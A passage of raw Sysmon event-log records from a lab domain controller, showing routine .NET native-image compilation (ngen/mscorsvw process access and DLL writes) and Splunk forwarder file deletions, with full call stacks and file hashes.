+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.435{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F80D71C873B75FF5B86F14EA140E2668,SHA256=11F0EE4468E32D104217DD5089FEDE17452BFC053685B6210A5BBB7675FD9B7F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.294{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21D-60D3-7004-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.278{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A21D-60D3-7004-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:33.278{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21D-60D3-7004-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.185{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F2F680E681594DB0D34EA67C49DEBFF,SHA256=776BF8EA469B29F7414E1D063B137402A192E725BA143DA274B8CAD91456746E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:33.185{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=099F10003B16DDF11F4E5182F42DF02D,SHA256=ED219A76F9E5BBE02EDCEE9B2F869F403ECD5360BE76A42C1DC4B464CCD128D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.169{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21D-60D3-6F04-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:33.154{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A21D-60D3-6F04-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:33.154{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21D-60D3-6F04-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:33.060{4DB9351A-A21C-60D3-6E04-00000000CF01}2364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\93c-0\System.Data.Entity.Design.dll2021-06-23 21:05:33.060 10341000x800000000000000021549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:34.794{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21E-60D3-7204-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.778{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A21E-60D3-7204-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:34.778{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21E-60D3-7204-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:34.669{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21E-60D3-7104-00000000CF01}5524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.653{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A21E-60D3-7104-00000000CF01}5524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:34.653{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21E-60D3-7104-00000000CF01}5524C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:34.530{4DB9351A-A21D-60D3-7004-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14f4-0\System.Data.Linq.dll2021-06-23 21:05:34.530 23542300x800000000000000021542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.513{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F2F680E681594DB0D34EA67C49DEBFF,SHA256=776BF8EA469B29F7414E1D063B137402A192E725BA143DA274B8CAD91456746E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:34.450{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16810E130834E96FFA88FD007A8194BF,SHA256=FD46B09DD49768BE752BAF2A6F17BEF22A309C3F20D56836E24A7BA538E97D24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.669{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74F1800B3517F57674783FD418DE7D0C,SHA256=CA317854BC893731A386C5557FD5355F0F5006F35F85E732CEB7E1901A3A9B88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:35.606{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21F-60D3-7404-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.591{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A21F-60D3-7404-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:35.591{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21F-60D3-7404-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.497{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEEAFFC96986C233E8F838C815E9F66B,SHA256=B38FEAF40577383A50160DDB4704CC0F45335541EE31E7BFFCBDF7BA60D15B6B,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000021553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.419{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A21F-60D3-7304-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:35.403{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A21F-60D3-7304-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:35.403{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A21F-60D3-7304-00000000CF01}4388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:35.310{4DB9351A-A21E-60D3-7204-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10b4-0\System.Data.OracleClient.dll2021-06-23 21:05:35.310 10341000x800000000000000021566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:36.685{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A220-60D3-7604-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 